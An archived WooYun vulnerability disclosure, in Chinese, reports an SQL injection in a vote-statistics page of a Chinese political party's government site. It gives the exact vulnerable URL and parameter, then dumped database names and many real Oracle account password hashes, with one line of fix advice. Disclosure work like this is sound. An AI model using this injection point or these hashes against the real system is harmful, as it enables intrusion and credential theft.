乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-04: 细节已通知厂商并且等待厂商处理中 2013-07-08: 厂商已经确认,细节仅向厂商公开 2013-07-18: 细节向核心白帽子及相关领域专家公开 2013-07-28: 细节向普通白帽子公开 2013-08-07: 细节向实习白帽子公开 2013-08-18: 细节向公众公开
某民主党派官网某应用SQL注射漏洞
http://cms.93.gov.cn:9091/app/vote/vote_form1_statistics.jsp?id=2070602421853087421
available databases [14]:[*] ADMIN[*] BBS[*] CA[*] JSXSOA[*] QS_CBADM[*] REPORT19[*] SYS[*] SYSTEM[*] WEBTEST[*] WKSYS[*] WMSYS[*] XDB[*] ZRCMS[*] ZRQK
database management system users password hashes:[*] _NEXT_USER [1]: password hash: NULL[*] ADMIN [1]: password hash: 89A2532B90CFB08D[*] ANONYMOUS [1]: password hash: anonymous[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] BACKUP [1]: password hash: 6E8300C33A27325E[*] BBS [1]: password hash: 02C287888C54AD15[*] CA [1]: password hash: 55C048742FA2124E[*] CONNECT [1]: password hash: NULL[*] CTXAPP [1]: password hash: NULL[*] DBA [1]: password hash: NULL[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] JS [1]: password hash: 93B92F0B2B37D113[*] JS1 [1]: password hash: 7DC6CCDD30729A4C[*] JSXSOA [1]: password hash: 2F0519A4BA667227[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] OEM_MONITOR [1]: password hash: NULL[*] OLAP_DBA [1]: password hash: NULL[*] OUTLN [1]: password hash: 0292C9F357BE0639[*] PUBLIC [1]: password hash: NULL[*] QS_CBADM [1]: password hash: 7C632AFB71F8D305[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] REPORT19 [1]: password hash: B6FEE47B31ACD125[*] RESOURCE [1]: password hash: NULL[*] SALES_HISTORY_ROLE [1]: password hash: NULL[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SYS [1]: password hash: CDCA7CDF6A6AEB10[*] SYSTEM [1]: password hash: 2D594E86F93B17A1[*] WEBTEST [1]: password hash: 03E8853C0FB1FDF1[*] WKPROXY [1]: password hash: B97545C4DD2ABE54[*] WKSYS [1]: password hash: 69ED49EE1851900D[*] WKUSER [1]: password hash: NULL[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299[*] XDB [1]: password hash: 5DC2B8F513889866[*] XDBADMIN [1]: password hash: NULL[*] ZRCMS [1]: password hash: 1BB99EE7747118F2[*] ZRQK [1]: password hash: ADC4CF32F60EE3C9
过滤参数id
危害等级:高
漏洞Rank:11
确认时间:2013-07-08 23:10
暂无